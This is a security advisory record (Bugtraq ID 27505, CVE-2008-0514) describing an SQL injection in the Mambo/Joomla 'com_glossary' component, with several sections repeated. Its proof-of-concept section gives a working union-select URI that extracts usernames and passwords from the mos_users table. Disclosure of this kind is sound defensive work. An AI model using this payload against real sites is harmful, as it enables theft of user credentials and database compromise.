Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
BID:27505
Info
Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
| Bugtraq ID: | 27505 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0514 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | S@BUN is credited with the discovery of this vulnerability. |
| Vulnerable: |
Mambo Glossary 0 |
| Not Vulnerable: |
Mambo Glossary 2.02 |
Discussion
Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
The 'com_glossary' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NOTE: The original report states that this issue affects 'com_glossary' 2.0. The vendor states that 2.02 is not affected due to the use of 'intval' and that 2.0 is not likely affected.
The 'com_glossary' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NOTE: The original report states that this issue affects 'com_glossary' 2.0. The vendor states that 2.02 is not affected due to the use of 'intval' and that 2.0 is not likely affected.
Exploit / POC
Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--
Solution / Fix
Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
Solution:
The vendor states that 'com_glossary' 2.02 is not affected by this issue.
Mambo Glossary 0
Solution:
The vendor states that 'com_glossary' 2.02 is not affected by this issue.
Mambo Glossary 0
References
Mambo/Joomla Glossary 'com_glossary' Component SQL Injection Vulnerability
References:
References:
- Mambo Glossary Component Page (Mambo)
- Mambo Homepage (Mambo)